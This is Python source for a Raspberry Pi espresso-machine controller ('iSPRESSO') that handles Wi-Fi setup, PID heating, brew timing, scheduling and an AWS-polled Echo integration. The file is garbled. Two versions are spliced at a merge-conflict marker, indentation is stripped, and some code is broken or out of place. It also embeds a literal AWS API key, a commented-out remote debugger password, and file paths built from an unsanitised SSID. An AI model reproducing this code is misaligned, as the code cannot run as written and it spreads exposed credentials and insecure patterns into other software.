fout = open(filename, 'w') # creates the file where the uploaded file should be stored
fout.write(mycert.ca_cert.file.read()) # writes the uploaded file to the newly created file.
fout.close() # closes the file, upload complete.
logger.debug("SETUP: Enterprise - cert file written: " + filename)
with open ('/var/www/setup/interfaces_default', 'r') as file:
lines = file.readlines()
for idx, line in enumerate(lines):
if line.find("wpa-ssid") > -1:
lines[idx] = ' wpa-ssid "' + ssid + '"\n'
if line.find("wpa-psk") > -1:
lines[idx] = '# wpa-psk \n' # commenting out the PSK line for Enterprise, we're going to do wpa-supplicant instead
if line.find("pre-up") > -1:
lines[idx] = ' pre-up wpa_supplicant -B -Dwext -i wlan0 -c/etc/wpa_supplicant/wpa_supplicant.conf -f /var/log/wpa_supplicant.log \n'
if line.find("post-down") > -1:
lines[idx] = ' post-down killall -q wpa_supplicant \n'
with open('/var/www/setup/ssid/' + ssid + '/interfaces', 'w') as file:
file.writelines(lines)
with open ('/var/www/setup/wpa_supplicant.conf', 'r') as file:
lines = file.readlines()
for idx, line in enumerate(lines):
if line.find(" ssid") > -1: # need the trailing space so it doesnt squash scan_ssid field
lines[idx] = ' ssid="' + ssid + '"\n'
if line.find("key_mgmt") > -1:
lines[idx] = ' key_mgmt=' + input.key_mgmt + '\n'
if line.find("pairwise") > -1:
lines[idx] = ' pairwise=' + input.pairwise + '\n'
if line.find("group") > -1:
lines[idx] = ' group=' + input.group + '\n'
if line.find("psk") > -1:
lines[idx] = ' psk="' + input.psk + '"\n'
if line.find("eap") > -1:
lines[idx] = ' eap=' + input.eap + '\n'
if line.find("identity") > -1:
lines[idx] = ' identity="' + input.identity + '"\n'
if line.find("password") > -1:
lines[idx] = ' password="' + passwd + '"\n'
if line.find("ca_cert=") > -1 : # need the trailing = so it doesn't squash ca_cert2 field
lines[idx] = ' ca_cert="' + filename + '"\n'
with open('/var/www/setup/ssid/' + ssid + '/wpa_supplicant.conf', 'w') as file:
file.writelines(lines)
subprocess.call("/var/www/setup/default.sh 2>&1 >> /var/log/smartconnect.log", shell=True) # , Shell=True
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
@staticmethod
def get_ssid_list():
try:
iwlist_cmd = "iwlist wlan0 scanning | grep ESSID"
proc = subprocess.Popen(iwlist_cmd, shell=True, stdout=subprocess.PIPE)
myNwList = []
while True:
line = proc.stdout.readline()
if line != '':
line = line[line.find('"') + 1 : len(line) - 2]
myNwList.append(line)
else:
break
return myNwList
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def get_immediate_subdirectories(a_dir):
return [name for name in os.listdir(a_dir)
if os.path.isdir(os.path.join(a_dir, name))]
@staticmethod
def check_connected(): # assumes we have a wifi configuration in place in /etc/network/interfaces and we want to test it
try:
url = "http://google.com"
response = requests.get(url)
return True
except:
pass
return False
@staticmethod
def wifi_connect():
try:
if setup.check_connected():
return True
my_ssid_list = setup.get_ssid_list()
my_subdir_list = setup.get_immediate_subdirectories("/var/www/setup/ssid/")
for ssid in my_ssid_list: # need to compare lists, and try out each one that matches
if ssid in my_subdir_list: # attempt connection - move file(s) into place, and recycle ifdown & ifup
logger.debug("wifi_connect: trying ssid = " + ssid)
shutil.copy2("/var/www/setup/ssid/" + ssid + "/interfaces", "/etc/network/interfaces")
if os.path.isfile("/var/www/setup/ssid/" + ssid + "/wpa_supplicant.conf"):
shutil.copy2("/var/www/setup/ssid/" + ssid + "/wpa_supplicant.conf", "/etc/wpa_supplicant/wpa_supplicant.conf")
my_cmd = "sudo ifdown wlan0 && sudo ifup wlan0"
proc = subprocess.Popen(my_cmd, shell=True, stdout=subprocess.PIPE)
                    if setup.check_connected():
return True
return False
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
@staticmethod
def smart_connect():
logger.debug("Calling SmartConnect setup.sh")
subprocess.call("/var/www/setup/smartconnect.sh 2>&1 >> /var/log/smartconnect.log", shell=True)
class schedule:
def GET(self):
with open("schedule.json") as f:
filecontents = json.load(f)
return render.schedule(json.dumps(filecontents), str(datetime.now())) # a JSON object (string) at this point
def POST(self):
data = web.data() # web.input gives back a Storage < > thing
mydata = json.loads(data)
with open("schedule.json") as f:
my_schedule = json.load(f)
week = {'Sunday':0, 'Monday':1, 'Tuesday':2, 'Wednesday':3, 'Thursday':4, 'Friday':5, 'Saturday':6}
my_schedule['days'][week[mydata['day']]]['time']['startTime'] = mydata['time']['startTime']
my_schedule['days'][week[mydata['day']]]['time']['endTime'] = mydata['time']['endTime']
tellHeatProc(None, True) # FLUSH the cache so that the other process picks up the changes
with open("schedule.json", "wb") as output_file:
json.dump(my_schedule, output_file)
return json.dumps("OK")
def tempdata():
try:
one_wire = mem.one_wire # gets set below, on init "/sys/bus/w1/devices/28-000004e0badb/w1_slave"
pipe = Popen(["cat", one_wire], stdout=PIPE)
result = pipe.communicate()[0]
result_list = result.split("=")
try:
temp_C = float(result_list[-1]) / 1000 # temp in Celcius
except ValueError: # probably means we can't read the 1-wire sensor
# logger.warn('Could not get a value from 1-wire connector. Using ' + one_wire )
temp_C = 0
return temp_C
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
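# Typical w1_slave contents parsed above (readings are illustrative; format is the stock
# 1-wire therm driver output):
#   72 01 4b 46 7f ff 0e 10 57 : crc=57 YES
#   72 01 4b 46 7f ff 0e 10 57 t=23125
# result.split("=")[-1] is then "23125", giving temp_C = 23.125.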
def catchButton(btn): # GPIO
try:
time.sleep(0.05)
if GPIO.input(btn) != GPIO.HIGH: # check to see if the input button is still high, protect against EMI false positive
return
        if (GPIO.input(gpio_btn_heat_sig) == GPIO.HIGH) and (GPIO.input(gpio_btn_pump_sig) == GPIO.HIGH):  # both buttons pressed
            # mem.lcd_connection.send(["Live long", "and prosper!", 1])  # easter egg (LCD support is disabled above)
            # mem.lcd_connection.send(["iSPRESSO", "", 0])
logger.info("You found an easter egg!")
return
if btn == gpio_btn_heat_sig:
now = time.time()
if now - mem.time_heat_button_pressed < 1:
mem.time_heat_button_pressed = now
return
mem.time_heat_button_pressed = now
if param.mode == "off":
GPIO.output(gpio_btn_heat_led, GPIO.HIGH) # this is a bit of a hack because the temp control also regulates the LED but putting it here gives better user experience.
logger.debug("catchButton: telling Heat Proc AUTO (ON) ")
tellHeatProc("auto")
else:
GPIO.output(gpio_btn_heat_led, GPIO.LOW)
logger.debug("catchButton: telling Heat Proc OFF")
tellHeatProc("off")
elif btn == gpio_btn_pump_sig:
logger.debug("catchButton: telling Brew Proc (toggle)")
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
mem.brew_connection.send([time_stamp, brew_plan])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class logdisplay:
def GET(self):
fp = open('/var/log/ispresso.log', 'rU') # reading file from file path
text = fp.read() # no problem found till this line.
fp.close()
return render.logdisplay(text) # calling file_display.html
def cleanUp():
logger.info("Shutting down...")
mem.lcd_connection.send(["iSPRESSO", "Shutting down", 0])
execfile ('shutdown.py')
if __name__ == '__main__':
try:
logger_init()
os.chdir("/var/www")
call(["modprobe", "w1-gpio"])
call(["modprobe", "w1-therm"])
#call(["modprobe", "i2c-dev"])
base_dir = '/sys/bus/w1/devices/'
try:
base_dir = glob.glob(base_dir + '3b*')[0]
except:
logger.error("EPIC FAIL! 1-Wire Temp sensor not found in " + base_dir)
mem.one_wire = base_dir + '/w1_slave'
urls = ("/", "ispresso", "/settings", "settings", "/schedule", "schedule", "/advanced", "advanced", "/getstatus", "getstatus", "/logdisplay", "logdisplay", "/setup", "setup", "/echo", "echo")
render = web.template.render("/var/www/templates/")
app = web.application(urls, globals())
atexit.register(cleanUp)
statusQ = Queue(2)
parent_conn, child_conn = Pipe()
#lcd_parent_conn, lcd_child_conn = Pipe()
#mem.lcd_connection = lcd_parent_conn
initialize()
cloud_parent_conn, cloud_child_conn = Pipe()
mem.cloud_connection = cloud_parent_conn
brew_parent_conn, brew_child_conn = Pipe()
mem.brew_connection = brew_parent_conn
global_vars = globalvars()
GPIO.add_event_detect(gpio_btn_heat_sig, GPIO.RISING, callback=catchButton, bouncetime=250)
#GPIO.add_event_detect(gpio_btn_pump_sig, GPIO.RISING, callback=catchButton, bouncetime=250) # was RISING, at one point HIGH. who knows
mem.heat_connection = parent_conn
#lcdproc = Process(name="lcdControlProc", #target=lcdControlProc, args=(lcd_child_conn,))
#lcdproc.start()
brewproc = Process(name="brewControlProc", target=brewControlProc, args=(brew_child_conn,))
brewproc.start()
cloudproc = Process(name="cloudControlProc", target=cloudControlProc, args=(global_vars, brew_parent_conn,))
cloudproc.start()
p = Process(name="tempControlProc", target=tempControlProc, args=(global_vars, param.mode, param.cycle_time, param.duty_cycle, \
param.set_point, param.k_param, param.i_param, param.d_param, statusQ, child_conn))
p.start()
app.add_processor(add_global_hook(parent_conn, statusQ))
app.run()
except KeyboardInterrupt:
cleanUp()
sys.exit()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
cleanUp()
sys.exit()
if mem.scheduler_enabled: # if program is just been started, set the mode according to the schedule, assuming schedule is ON
tellHeatProc("auto")
=======
#!/usr/bin/python
# Copyright (c) 2013 Chris Synan & Dataworlds LLC
# Portions copyright (c) 2012 Stephen P. Smith
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The software is free for non-commercial uses. Commercial uses of this software
# or any derivative must obtain a license from Dataworlds LLC (Austin TX)
# In addition, the above copyright notice and this permission notice shall
# be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
# IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, os, time, shutil, logging, logging.handlers, traceback
import threading, subprocess, requests
import urllib3.contrib.pyopenssl
import multiprocessing
from multiprocessing import Process, Pipe, Queue, Value, current_process
from subprocess import Popen, PIPE, call, signal
from datetime import datetime
from shutil import copy2
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
import web, random, json, atexit
from pid import pidpy as PIDController
import RPi.GPIO as GPIO
import glob
# logging.basicConfig()
#logger = logging.getLogger('ispresso')
# REMOTE DEBUG -- TODO: Remove this before going to production
# import rpdb2
# rpdb2.start_embedded_debugger('funkymonkey', fAllowRemote = True)
gpio_heat = 12
gpio_btn_heat_led = 5
gpio_btn_heat_sig = 6
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(gpio_btn_heat_sig, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(gpio_heat, GPIO.OUT)
GPIO.setup(gpio_btn_heat_led, GPIO.OUT)
#def logger_init():
logger.setLevel(logging.DEBUG)
log_file_size = 1024 * 1024 * 1 # 1 MB
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(process)d - %(name)s : %(message)s')
fh = logging.handlers.RotatingFileHandler('/var/log/ispresso.log', maxBytes=log_file_size, backupCount=5)
fh.setFormatter(formatter)
sh = logging.StreamHandler(sys.stdout)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
logger.info('******************************************')
logger.info('Starting up...')
def initialize():
settings.load()
if setup.wifi_connect() == False: # this needs to happen after lcd pipe is set up
logger.warn("WiFi can't connect to internet. Entering Smart Connect mode. Connect to iSPRESSO wireless network.")
mem.lcd_connection.send(["iSPRESSO WiFi", "Access Point", 0])
setup.smart_connect()
else:
logger.info("WiFi connection looks ok")
mem.lcd_connection.send(["Coil King", "WiFi Connected", 3])
mem.lcd_connection.send(["Coil King", "", 0])
class mem: # global class
cache_day = None
cache_start_time = None
cache_end_time = None
heat_connection = Pipe()
#lcd_connection = Pipe()
brew_connection = Pipe()
cloud_connection = Pipe()
flag_pump_on = False
sched_flag_on = False
sched_flag_off = False
time_heat_button_pressed = time.time()
scheduler_enabled = True
presoak_time = 3
wait_time = 2
brew_time = 25
one_wire = None
class globalvars(object):
def __init__(self, initval = 0):
self.temperature = multiprocessing.Value("i", initval)
def set_temp(self, n=0):
with self.temperature.get_lock():
self.temperature.value = n
@property
def temp(self):
with self.temperature.get_lock():
return self.temperature.value
class param:
mode = "off"
cycle_time = 2.0
duty_cycle = 0.0
set_point = 640
k_param = 6 # was 6
i_param = 60 # was 120
d_param = 15 # was 5
def add_global_hook(parent_conn, statusQ):
# mem.heat_connection = parent_conn
g = web.storage({"parent_conn" : parent_conn, "statusQ" : statusQ})
def _wrapper(handler):
web.ctx.globals = g
return handler()
return _wrapper
class advanced:
def __init__(self):
self.mode = param.mode
self.cycle_time = param.cycle_time
self.duty_cycle = param.duty_cycle
self.set_point = param.set_point
self.k_param = param.k_param
self.i_param = param.i_param
self.d_param = param.d_param
def GET(self):
return render.advanced(self.mode, self.set_point, self.duty_cycle, self.cycle_time, self.k_param, self.i_param, self.d_param)
def POST(self):
data = web.data()
datalist = data.split("&")
for item in datalist:
datalistkey = item.split("=")
if datalistkey[0] == "mode":
self.mode = datalistkey[1]
if datalistkey[0] == "setpoint":
self.set_point = float(datalistkey[1])
if datalistkey[0] == "dutycycle":
self.duty_cycle = float(datalistkey[1])
if datalistkey[0] == "cycletime":
self.cycle_time = float(datalistkey[1])
if datalistkey[0] == "k":
self.k_param = float(datalistkey[1])
if datalistkey[0] == "i":
self.i_param = float(datalistkey[1])
if datalistkey[0] == "d":
self.d_param = float(datalistkey[1])
param.mode = self.mode
param.cycle_time = self.cycle_time
param.duty_cycle = self.duty_cycle
param.set_point = self.set_point
param.k_param = self.k_param
param.i_param = self.i_param
param.d_param = self.d_param
settings.save()
web.ctx.globals.parent_conn.send([self.mode, self.cycle_time, self.duty_cycle, self.set_point, self.k_param, self.i_param, self.d_param, False])
def gettempProc(global_vars, conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("getTempProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
while (True):
t = time.time()
            time.sleep(0.5)  # ~0.5 s sleep plus ~0.8 s for the 1-wire read gives a loop period of roughly 1.3 s
num = tempdata()
elapsed = "%.2f" % (time.time() - t)
conn.send([num, elapsed])
fah = (9.0 / 5.0) * num + 32
global_vars.set_temp(int(fah)) # convert to int before storing the global var
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def getonofftime(cycle_time, duty_cycle):
duty = duty_cycle / 100.0
on_time = cycle_time * (duty)
off_time = cycle_time * (1.0 - duty)
return [on_time, off_time]
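# Example: with cycle_time=2.0 and duty_cycle=25, getonofftime() returns
# [0.5, 1.5] -- the heater is driven for 0.5 s and rests for 1.5 s per cycle.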
def tellHeatProc(heat_mode=None, flush_cache=None):
if flush_cache is None:
flush_cache = False
if heat_mode is not None:
param.mode = heat_mode
mem.heat_connection.send([param.mode, param.cycle_time, param.duty_cycle, param.set_point, param.k_param, param.i_param, param.d_param, flush_cache])
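# The 8-element message sent above mirrors what tempControlProc expects from
# conn.recv(): [mode, cycle_time, duty_cycle, set_point, k_param, i_param,
# d_param, flush_cache]. Passing flush_cache=True (as schedule.POST does)
# forces the scheduler cache used by scheduled_mode() to be rebuilt.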
def heatProc(cycle_time, duty_cycle, conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("heatProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
while (True):
while (conn.poll()): # get last
cycle_time, duty_cycle = conn.recv()
conn.send([cycle_time, duty_cycle])
if duty_cycle == 0:
GPIO.output(gpio_heat, GPIO.LOW)
time.sleep(cycle_time)
elif duty_cycle == 100:
GPIO.output(gpio_heat, GPIO.HIGH)
time.sleep(cycle_time)
else:
on_time, off_time = getonofftime(cycle_time, duty_cycle)
GPIO.output(gpio_heat, GPIO.HIGH)
time.sleep(on_time)
GPIO.output(gpio_heat, GPIO.LOW)
time.sleep(off_time)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
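# heatProc() implements slow, time-proportioned switching of the heater output
# (likely a relay/SSR on gpio_heat): each cycle_time window is split into an
# on-period and an off-period according to duty_cycle, with 0 and 100 handled
# as fully-off / fully-on special cases.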
def brewControlProc(brew_child_conn):
p = current_process()
logger = logging.getLogger("ispresso").getChild("brewControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
mem.flag_pump_on = False
button_bounce_threshold_secs = 1
while(True):
time_button_pushed, brew_plan = brew_child_conn.recv() # BLOCKS until something shows up
mem.flag_pump_on = True
for listitem in brew_plan:
if mem.flag_pump_on == False:
while brew_child_conn.poll(): # clear out anything other button presses in the queue
brew_child_conn.recv()
break
action = listitem[0]
duration = listitem[1]
counter = 0
start_time = time.time()
if action.upper() in ("PRESOAK", "BREW"):
GPIO.output(gpio_btn_pump_led, GPIO.HIGH)
GPIO.output(gpio_pump, GPIO.HIGH)
                    while counter < duration and mem.flag_pump_on:  # the flag_pump_on check may be redundant, as it's already tested above
time.sleep(0.1)
if brew_child_conn.poll(): # mem.brew_connection.poll() returns TRUE or FALSE immediately and does NOT block
time_button_pushed_again, throwaway_brew_plan = brew_child_conn.recv() # get item off the list, check how long since time_button_pushed, against button_bounce_threshold_secs. If too short, clean up and exit this loop
if time_button_pushed_again - time_button_pushed > button_bounce_threshold_secs:
GPIO.output(gpio_pump, GPIO.LOW)
GPIO.output(gpio_btn_pump_led, GPIO.LOW)
mem.flag_pump_on = False
mem.lcd_connection.send([None, "", 0])
break
if (time.time() - start_time) >= counter:
counter = counter + 1
message = action + 'ing ' + str(duration - counter) + 's'
mem.lcd_connection.send([None, message, 0])
logger.debug(message)
GPIO.output(gpio_pump, GPIO.LOW)
GPIO.output(gpio_btn_pump_led, GPIO.LOW)
mem.lcd_connection.send([None, '', 0])
while brew_child_conn.poll(): # clear out anything other button presses in the queue
brew_child_conn.recv()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
finally:
GPIO.output(gpio_pump, GPIO.LOW)
GPIO.output(gpio_btn_pump_led, GPIO.LOW)
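# cloudControlProc() polls an AWS API Gateway endpoint roughly every
# secs_cmd_interval seconds, posting the current temperature keyed by the
# stored echo userId (apparently an Amazon Echo/Alexa integration). Any pending
# "brew" command that is no more than about a minute old is executed by
# forwarding a brew plan down the brew pipe; older commands are ignored.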
def cloudControlProc(global_vars, brew_conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("cloudControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
last_cmd_time = time.time()
secs_cmd_interval = 1.25
echoUserId = ""
# TODO: fetch userId from file on startup - also means we have to bounce the service when set from /echo POST
try:
with open("echo.json") as readFile:
my_settings = json.load(readFile)
echoUserId = my_settings["userId"]
except (IOError, ValueError):
logger.debug("Killing cloud process as we don't have a valid echoUserId")
return False # EXIT if we don't have a valid echoUserId - no sense racking up an AWS bill if we don't need to!
if not setup.check_connected():
logger.debug("Killing cloud process as we are not connected to internet")
return False # not going to keep this process running if we are not connected to internet.
if echoUserId == "":
logger.debug("Killing cloud process as we still don't have a valid echoUserId")
return False
logger.debug("Starting main loop with echoUserId = " + echoUserId)
while True:
time.sleep(0.1)
now_time = time.time()
if now_time - last_cmd_time > secs_cmd_interval:
last_cmd_time = now_time
try:
temp = global_vars.temp
url = 'https://ltqynxd6pc.execute-api.us-east-1.amazonaws.com/prod/ispresso-cloud-status-command' # post status to AWS, check for a command. Delete command from AWS. Execute command here
payload = {'echoUserId': echoUserId, 'temp': temp, 'temp_unit' : ' Fahrenheit'}
payload = json.dumps(payload)
headers = {'x-api-key': 'FqwN8fidPq7vvPTPcsOHd2V0BtAd17768Kq8UPM5'}
resp = requests.post(url, data=payload, headers=headers)
data = json.loads(resp.text)
if len(data.keys()) > 0: #[0] == "Item":
logger.debug("Received payload from AWS: " + str(data))
command = data["Item"]["command"]
currenttime = data["Item"]["currenttime"]
commandtime = data["Item"]["datetime"]
logger.debug("command = " + command)
if command == "brew":
# check to see if not too much time has passed from command to current time
min_diff = round((currenttime - commandtime) / 60000) ;
if min_diff > 1:
logger.error("Command is " + str(min_diff) + " minutes old! ")
else:
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
logger.debug("Caught POST, Pump button. brewing ... " + str(brew_plan))
brew_conn.send([time_stamp, brew_plan])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
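# tempControlProc() is the main control loop: it spawns gettempProc (sensor
# reads) and heatProc (output switching), feeds each new reading through the
# PID controller when mode == "auto", drives the heat-button LED, pushes status
# onto statusQ for the web UI, and picks up settings changes POSTed through the
# parent connection.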
def tempControlProc(global_vars, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param, statusQ, conn):
p = current_process()
logger = logging.getLogger('ispresso').getChild("tempControlProc")
logger.info('Starting:' + p.name + ":" + str(p.pid))
try:
parent_conn_temp, child_conn_temp = Pipe()
ptemp = Process(name="gettempProc", target=gettempProc, args=(global_vars, child_conn_temp,))
ptemp.daemon = True
ptemp.start()
parent_conn_heat, child_conn_heat = Pipe()
pheat = Process(name="heatProc", target=heatProc, args=(cycle_time, duty_cycle, child_conn_heat))
pheat.daemon = True
pheat.start()
pid = PIDController.pidpy(cycle_time, k_param, i_param, d_param) # init pid
flush_cache = False
last_temp_C = 0
while (True):
time.sleep(0.1)
readytemp = False
while parent_conn_temp.poll():
temp_C, elapsed = parent_conn_temp.recv() # non blocking receive
mode = scheduled_mode(mode) # check to see if scheduler should fire on or off -- MOVING THIS as the OFF doesnt seem to fire..
if temp_C > 0: # the 1-wire sensor sometimes comes back with 0 -- need to fix that by holding on to last value.
last_temp_C = temp_C
else:
temp_C = last_temp_C
temp_F = (9.0 / 5.0) * temp_C + 32
temp_C_str = "%3.2f" % temp_C
temp_F_str = "%3.2f" % temp_F
temp_F_pretty = "%3.0f" % temp_F
mem.lcd_connection.send(['Coil King ' + str(temp_F_pretty) + ' F', None, 0])
readytemp = True
if readytemp == True:
if mode == "auto":
duty_cycle = pid.calcPID_reg4(temp_F, set_point, True)
parent_conn_heat.send([cycle_time, duty_cycle])
GPIO.output(gpio_btn_heat_led, GPIO.HIGH)
elif mode == "off":
duty_cycle = 0
parent_conn_heat.send([cycle_time, duty_cycle])
GPIO.output(gpio_btn_heat_led, GPIO.LOW)
if (not statusQ.full()):
statusQ.put([temp_F_str, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param]) # GET request
                readytemp = False
while parent_conn_heat.poll(): # non blocking receive
cycle_time, duty_cycle = parent_conn_heat.recv()
while conn.poll(): # POST settings
mode, cycle_time, duty_cycle_temp, set_point, k_param, i_param, d_param, flush_cache = conn.recv()
if flush_cache:
mem.cache_day = None # this should force cache flush
flush_cache = False
mode = scheduled_mode(mode) # check to see if scheduler should fire on or off
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class getstatus:
def __init__(self):
pass
def GET(self): # blocking receive
if (statusQ.full()): # remove old data
for i in range(statusQ.qsize()):
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
out = json.dumps({"temp" : temp, "elapsed" : elapsed, "mode" : mode, "cycle_time" : cycle_time, "duty_cycle" : duty_cycle,
"set_point" : set_point, "k_param" : k_param, "i_param" : i_param, "d_param" : d_param, "pump" : mem.flag_pump_on})
return out
def POST(self):
pass
@staticmethod
def get_temp():
if (statusQ.full()): # remove old data
for i in range(statusQ.qsize()):
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
out = json.dumps({"temp" : temp, "elapsed" : elapsed, "mode" : mode, "cycle_time" : cycle_time, "duty_cycle" : duty_cycle,
"set_point" : set_point, "k_param" : k_param, "i_param" : i_param, "d_param" : d_param, "pump" : mem.flag_pump_on})
        return json.loads(out)["temp"]
class echo:
def GET(self):
mystring = "{}"
try:
with open("echo.json") as f:
filecontents = json.load(f)
mystring = json.dumps(filecontents)
except (IOError, ValueError):
open("echo.json", 'a').close()
return render.echo(mystring) # a JSON object (string) at this point
def POST(self):
data = web.data() # web.input gives back a Storage < > thing
mydata = json.loads(data)
echoUserId = ""
try:
for datalistkey in mydata:
logger.debug("datalistkey = " + str(datalistkey))
if datalistkey == "userId":
echoUserId = mydata[datalistkey]
logger.debug("Echo userId changing to " + str(mydata[datalistkey]))
with open("echo.json") as saveFile:
try:
my_settings = json.load(saveFile)
except ValueError:
my_settings = json.loads("{}")
my_settings['userId'] = echoUserId
logger.debug("Echo config updating: " + str(mydata))
with open("echo.json", "wb") as output_file:
json.dump(my_settings, output_file)
return json.dumps("OK")
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class settings:
def GET(self):
with open("settings.json") as f:
filecontents = json.load(f)
return render.settings(json.dumps(filecontents)) # a JSON object (string) at this point
def POST(self):
data = web.data() # web.input gives back a Storage < > thing
mydata = json.loads(data)
for datalistkey in mydata:
logger.debug("datalistkey = " + str(datalistkey))
if datalistkey == "temp":
param.set_point = int(mydata[datalistkey])
logger.debug("temp changed to " + str(mydata[datalistkey]))
if datalistkey == "brewSecs":
mem.brew_time = int(mydata[datalistkey])
logger.debug("brew secs changed")
if datalistkey == "soakSecs":
mem.presoak_time = int(mydata[datalistkey])
logger.debug("soak secs changed")
if datalistkey == "waitSecs":
mem.wait_time = int(mydata[datalistkey])
logger.debug("wait secs changed")
logger.debug("Settings updated: " + str(mydata))
settings.save()
@staticmethod
def load():
with open("settings.json") as loadFile:
my_settings = json.load(loadFile)
mem.brew_time = my_settings["brewSecs"]
mem.presoak_time = my_settings["soakSecs"]
mem.wait_time = my_settings["waitSecs"]
param.set_point = my_settings["temp"]
param.k_param = my_settings["p_value"]
param.i_param = my_settings["i_value"]
param.d_param = my_settings["d_value"]
@staticmethod
def save():
with open("settings.json") as saveFile:
my_settings = json.load(saveFile)
my_settings['brewSecs'] = mem.brew_time
my_settings['soakSecs'] = mem.presoak_time
my_settings['waitSecs'] = mem.wait_time
my_settings['temp'] = param.set_point
my_settings['p_value'] = param.k_param
my_settings['i_value'] = param.i_param
my_settings['d_value'] = param.d_param
logger.debug("About to save settings = " + str(my_settings))
with open("settings.json", "wb") as output_file:
json.dump(my_settings, output_file)
class ispresso:
def GET(self):
return render.ispresso()
def POST(self):
op = ""
flag = ""
data = web.data()
datalist = data.split("&")
for item in datalist:
datalistkey = item.split("=")
if datalistkey[0] == "operation":
op = datalistkey[1]
if datalistkey[0] == "flag":
flag = datalistkey[1]
if str(op).upper() == "HEAT":
if flag == "on":
tellHeatProc("auto")
else:
tellHeatProc("off")
elif str(op).upper() == "PUMP":
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
logger.debug("Caught POST, Pump button. brewing ... " + str(brew_plan))
mem.brew_connection.send([time_stamp, brew_plan])
def brew(self):
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
logger.debug("called brew method ... " + str(brew_plan))
mem.brew_connection.send([time_stamp, brew_plan])
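# scheduled_mode() drives the heater from schedule.json: on the first call of a
# new day (or after a cache flush) it re-reads today's startTime/endTime,
# resets its one-shot flags and returns "off"; afterwards it returns "auto"
# exactly once when the clock enters the window and "off" exactly once when it
# leaves, otherwise handing back the caller's current mode unchanged. Days are
# indexed Sunday=0 .. Saturday=6 (isoweekday()'s 7 is remapped to 0).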
def scheduled_mode(old_mode):
try:
now = datetime.now()
today = datetime.isoweekday(datetime.now())
if today == 7:
today = 0
if mem.cache_day is None or mem.cache_day != today: # refresh cache, reset flags, turn off heat
logger.debug("scheduled_mode: cache flush or new day. resetting flags, turning off heat.")
mem.cache_day = today
mem.sched_flag_off = False
mem.sched_flag_on = False
with open("schedule.json") as f:
my_schedule = json.load(f) # t= time.strptime("00:05:42.244", "%H:%M:%S")
mem.cache_start_time = my_schedule['days'][today]['time']['startTime']
